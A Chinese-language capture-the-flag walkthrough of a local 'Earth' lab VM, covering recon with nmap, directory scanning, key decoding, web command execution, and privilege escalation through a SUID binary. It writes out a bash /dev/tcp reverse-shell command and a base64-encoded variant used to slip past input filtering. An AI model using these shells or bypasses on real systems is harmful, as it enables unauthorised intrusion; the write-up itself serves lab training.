注:严禁恶意攻击及非法利用,由此所产生的一切后果均由读者自行承担!!!
1.信息收集
1)vmware虚拟靶场
2)arp探测一下ip地址:
3)使用工具nmap扫描获取系统版本或开放的端口:
4)看到开放80和443端口时http服务,访问一下:
5)bad request 400,请求参数错误,nmap扫描的时候,发现有两个DNS,添加到host文件中:
6)绑定域名后,就可以访问了:
2.目录探测
1)扫一下目录:
2)发现登陆页面:
3)再扫一下443:
4)访问一下index.html和robots.txt发现有测试注释:
3.信息利用
1)发现管理员账号,密码使用了testdata.txt加密算法:
2)输入tsetdata.txt发现一篇文章:
3)回到前面80端口访问到一些16进制字符,结合以上得到的信息加密传输遗留,大概是密钥:
4)对以上密钥进行转码,每段就会有一个重复:
4.内网渗透
1)尝试SSH连接,权限拒绝:
2)以上扫描还有一个登录页面,尝试一下,登录成功,提示命令可执行:
3)可执行CLI命令那就好办了,输入反弹shell命令,禁止远程连接:
指令:bash -i >& /dev/tcp/kali地址/侦听端口号 0>&1
4)尝试base64编码绕过:
5)转码后输入,再次提交,最多能输入100个字符,连接成功:
指令:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTA0LzI1MDAxIDA+JjE=}|{base64,-d}|{bash,-i}' //管道应字符超出空格删掉了
6)发现是个普通用户,查看是否存在python环境,切换交互式shell:
5.提权
1)查询具有uid标识的文件发现pkexec提权漏洞:
2)github搜索pkexec下载脚本到kali,开启http服务访问下载,没有权限:
3)以上查询uid标识的文件/usr/bi/reset_root查看一下,一堆乱码:
4)输入文件路径执行,提示触发失败:
5)使用nc将文件传出到kali:
6)然后kali这边用strace解析一下,缺少这三个文件执行不了:
7)在目标机上创建这三个文件在执行,成功拿到root密码(Earth),su切换到root,提权成功: